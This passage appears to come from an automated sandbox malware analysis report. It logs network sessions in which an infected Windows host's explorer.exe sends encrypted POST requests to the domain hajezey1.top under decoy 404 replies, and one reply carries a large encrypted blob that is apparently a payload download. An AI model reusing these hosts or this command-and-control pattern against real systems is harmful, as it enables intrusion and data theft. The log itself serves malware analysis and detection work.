Oct 29, 2021 20:50:06.865062952 CEST	6491	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49841	162.159.129.233	443	C:\Users\user\AppData\Local\Temp\3C84.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49827	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:06.962233067 CEST	6492	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://shpjiv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: hajezey1.top
Oct 29, 2021 20:50:06.962260008 CEST	6492	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 17 97 a6 1f Data Ascii: 6152Ek\lwmwu$f]d[1fu?Mg9&B d7_c3%:YZG
Oct 29, 2021 20:50:07.041573048 CEST	6493	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49829	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:07.144289970 CEST	6494	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wmbmyysgg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: hajezey1.top
Oct 29, 2021 20:50:07.144308090 CEST	6494	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 2b d8 dd 7f Data Ascii: 6152Ek\lwmwu$f]d+Tcc{nGm94NkK>DC>?&O3@~aDJ:6>B@V's!J.MysmnH.51auRCt
Oct 29, 2021 20:50:07.223151922 CEST	6495	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49830	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:07.317502975 CEST	6496	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hpmdwx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: hajezey1.top
Oct 29, 2021 20:50:07.317523003 CEST	6496	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8d 66 5d 02 c8 a1 c1 64 27 a8 8a 7a Data Ascii: 6152Ek\lwmwu$f]d'z\|unMel-1m[7E@xqgP8n3I?Y`Ubw[KBOw"O=3klz
Oct 29, 2021 20:50:07.396713018 CEST	6497	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49831	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:07.482285023 CEST	6498	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lmmge.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: hajezey1.top
Oct 29, 2021 20:50:07.482296944 CEST	6498	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8a 66 5d 02 c8 a1 c1 64 01 83 df 18 Data Ascii: 6152Ek\lwmwu$f]d6yoobG<8$sb\|Mj{4 (RN^x18#:+x`
Oct 29, 2021 20:50:07.557909012 CEST	6500	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:50:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 81 f5 97 d4 78 2b 2c 62 98 ed 24 c6 ff c5 d4 d9 49 0a 8a 10 c4 44 b9 97 c4 fa be a8 48 96 9e 9b 55 1a f6 de e8 d0 9b 92 17 7d 69 05 79 4a 09 9f 3c bf 00 62 4b 65 fb 80 ab 5b 87 80 39 cd bb 78 96 64 a4 a4 a2 41 45 e8 03 ff 0e 4d e2 d0 97 23 3b 5e 04 e8 5a 9a 14 7a 59 92 17 7e d6 70 82 ba 4b 96 7e bb ee 1f 38 33 d5 53 6f 27 88 32 e7 ce 85 b9 9b 3b 22 2f d9 3d ff 24 3c 78 92 93 78 f9 7e 21 86 a5 ec 34 Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RYyM]O_[3_JTO))gxr?\|^c[FXB$H)t\|;fKMXKw[Ge)29E"\|ay6N}o7=Up,Kk"HI?m\|6NI^LdU[0z_$U5=PoV`GZdQJVTq5dIvy'$X9:-C'GrPmR`#>[qJ8-,sqK0Z"?+Qz`KJMQAd'\#&Q#2YBA@=C/fGB%4VF>"7"~K6*!?eti6'NGc:HNDZOJW%bJ}Tzl9\@d=V:"}bP1&@N!;KnGAcWJ`_ng";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59x+,b$IDHU}iyJ<bKe[9xdAEM#;^ZzY~pK~83So'2;"/=$<xx~!4
Oct 29, 2021 20:50:07.557934999 CEST	6502	IN	Data Raw: b8 63 51 46 61 c6 bc 08 32 d3 a0 94 71 08 70 10 6f c4 f9 6e f3 be 99 ec 03 d0 b3 5a 06 42 3c 5e 9d 94 34 5f 44 41 cb 56 06 8c 60 3e 9f 6d f7 e2 cb 35 85 0f a4 36 dd 15 3d 76 07 b9 dc c8 b3 00 72 5d 1d 96 38 e9 82 c6 57 57 32 e8 88 38 20 33 b6 55 Data Ascii: cQFa2qponZB<^4_DAV`>m56=vr]8WW28 3UZQeD3>2d4j_),u<fT.GP$K]wJwfB<U~>F_:sg\SD[.(`%u!2f&T>UP},H?03/ZH/
Oct 29, 2021 20:50:07.557950974 CEST	6503	IN	Data Raw: 47 72 d4 90 45 d6 61 88 d2 8c fa a4 c6 39 f6 d0 f6 a4 6d cb 7d 7b df 3e d4 59 23 7c fe b7 91 a0 5f a8 11 94 59 5a 4c 5f 09 c9 b8 dc ef 27 2c b8 c8 7c 67 9e 18 fa 77 2f fc ec 28 ee ca 9e 96 77 87 62 b2 2a 0f ac 86 cd da a8 92 13 ff 6c cd c2 cb 98 Data Ascii: GrEa9m}{>Y#\|_YZL_',\|gw/(wblc89-L4Yx}2n8o]C6N(t[-5a2}].'ZOR>}J5ZDs/_k s1A1oz@rG7:RSm=M
Oct 29, 2021 20:50:07.557971954 CEST	6505	IN	Data Raw: e6 da 97 3c e3 86 67 07 6d 99 38 83 49 9b 90 8d 47 e3 77 40 fb 85 72 4b 30 80 6f ce c1 a7 db 09 ba 10 eb b8 cd fc 38 17 cd b2 b3 fd 67 6c a8 88 5a 20 3d 9e 68 a6 6f 69 ba 7a bb 6a f2 1c db da e9 f1 0a 6f 26 04 10 78 eb dd e1 2b 98 b4 b9 8d 4b 47 Data Ascii: <gm8IGw@rK0o8glZ =hoizjo&x+KGR1v!8I$FIWO0g:/"zSz)%p^{-n@vl[$>V0FFJWz*h! #<<Id,b)7ldG( 0M
Oct 29, 2021 20:50:07.557987928 CEST	6506	IN	Data Raw: e0 66 73 73 6b 6e 3c 51 7e 2f a2 47 87 77 2a 13 c0 f7 32 ee b6 7b c7 dd f0 48 59 78 c6 87 46 3c a1 b5 97 29 ef 31 ce d5 fe a9 fd a2 20 40 71 94 97 8b 03 68 7d bf 5e d9 0b e5 09 21 bc 16 ab 3e 71 b2 b0 07 41 7e 6d 7b cc 52 37 0e bf 0c a7 ec 21 92 Data Ascii: fsskn<Q~/Gw2{HYxF<)1 @qh}^!>qA~m{R7!d+;uDjY`\|QM{ar(j$]xx/b)26NQQ+$?,cf`pcu?P]2O>'8$ ?V?k [y,07G#}x{(;vxf&;
Oct 29, 2021 20:50:07.558001041 CEST	6507	IN	Data Raw: 68 18 ed 37 91 e3 fe cc a7 89 f6 52 e0 09 d2 99 9c fe 3c fa e4 ce 8d c3 5e 3f dc 5f f4 4e c2 8f b6 c6 3e 29 67 27 f8 ea ca 3a 48 d8 13 cf 85 1e 1f a7 9b 49 2c 8e 79 39 aa 10 2e 3c 00 c3 ae 5a cc ec cf 09 d1 f9 b0 b6 be db f9 6b 18 29 ef 77 ee 40 Data Ascii: h7R<^?_N>)g':HI,y9.<Zk)w@WxfKXghJ.IQ9Mb4Z.tBl+ ;Q,<l'v$9gSd3Xl'Ss6r uIs rb7v0mK<lYW2VtRk8`fk?NIs_
Oct 29, 2021 20:50:07.558046103 CEST	6509	IN	Data Raw: 81 74 d0 8a 79 65 0d a5 79 61 3a ff 2d 1b f1 9a 4a d7 73 af 46 7f 2c dc 01 08 4a 18 8f f1 d8 45 49 04 71 56 e3 65 e7 4d ca fc eb 57 53 dd a7 1c 71 06 26 46 be b7 a3 6a 36 af cf 43 90 69 91 2c dd 08 ca 1c c9 a5 5d de 55 8c ac d2 e5 1d a7 ec 0b f5 Data Ascii: tyeya:-JsF,JEIqVeMWSq&Fj6Ci,]Uds~A bn4De$gQPO .g2>mXL/O8[n:H/62W>}%b[5vW2000I(UGlRFOD\V9;g(jb
Oct 29, 2021 20:50:07.558067083 CEST	6510	IN	Data Raw: 9a 3d a2 82 c6 09 0c 9e 88 f6 1a 71 c8 fa 7d 19 32 93 7f 93 9a 6d 2b a6 32 96 36 0a cb 0b 6e 5b 7f 75 95 52 4e 35 97 b2 23 66 43 64 3b 92 f6 52 9b b7 bf 04 ae ed 5e 16 fe c5 2e 07 66 fc ed 1c 1a fd f2 7f e1 f5 f6 5d 47 65 1d f6 3e 7a a4 a2 6e a1 Data Ascii: =q}2m+26n[uRN5#fCd;R^.f]Ge>znLm:k)z\|t=%a#U(kk'w8Zi.l;s'\PQ.u,L]+eP6Ep-G9XPJg6Y*"uBPj1tIZMT+&
Oct 29, 2021 20:50:07.558084965 CEST	6512	IN	Data Raw: c3 18 52 9a 35 d2 03 6f e2 95 a8 3d ac 2b 96 0e 56 5c 20 f2 9d 42 88 7b 9d 99 d4 e9 46 f0 33 36 28 7a 06 2f ae 63 ed 1a e0 5e 98 d9 a8 6c 87 53 08 85 db 2a 34 ad 84 e2 8d 6e c4 2a 80 70 4e d0 9d 76 be 1e 53 c6 49 b1 71 64 cc 36 05 4f bd 2a b7 1f Data Ascii: R5o=+V\ B{F36(z/c^lS4npNvSIqd6O*O6oXY)a_/F?>E~8-cY1$j5g-&Jw2E>!lgfl1%OV\eILqm=G2rh`F~gvhXz/n>'o8
Oct 29, 2021 20:50:07.558139086 CEST	6513	IN	Data Raw: d5 cd b1 71 96 38 ad db 7f 85 46 70 77 e1 73 0b d7 12 27 69 f4 55 ed be 1e ec ae 4f 1d c7 b8 15 a4 99 73 cd c2 c5 d0 fb ba 07 8f 02 b5 41 ab 11 cb df 7a 91 0d ce 18 be 62 8a 2d d3 18 33 12 9f 07 02 bb b8 18 67 35 56 12 da eb 6a 74 e8 54 98 68 00 Data Ascii: q8Fpws'iUOsAzb-3g5VjtThYMYa49bW=XO6NDu"tU.RiMr.FN,Zgpb\QJ:,;P6[< 1>\7^P2\|f5RHo#<R<k6K
Oct 29, 2021 20:50:07.610347033 CEST	6514	IN	Data Raw: 2a 2b da a6 ae 48 76 82 50 85 bc 38 11 ec 52 d0 13 59 e7 e0 93 89 ea 3f 18 5e 99 de 73 ca c6 68 66 25 72 47 85 b7 72 79 50 b7 e7 c6 8e 0e 18 9a ea ee e7 5f e5 d3 d6 e0 65 94 2e f3 e3 af 6d b5 08 6d 0a 3f f7 3c 0a f6 74 40 ae 46 a2 c9 08 b0 63 9a Data Ascii: *+HvP8RY?^shf%rGryP_e.mm?<t@Fc[nIy<N[$%?1+6rxE3pw>=xTX#5R.%1E`#,3&5@KU Hjam5{I%oZ:my(y7~:B;2'3#.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49838	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:10.164185047 CEST	6878	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fexsjalrxu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: hajezey1.top
Oct 29, 2021 20:50:10.164244890 CEST	6878	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 8a 66 5d 02 c9 a1 c1 64 1f b0 d0 2d Data Ascii: 6152Ek\lwmwu$f]d-Cu=zX@BNX2L{-k#tzHd x//7)T
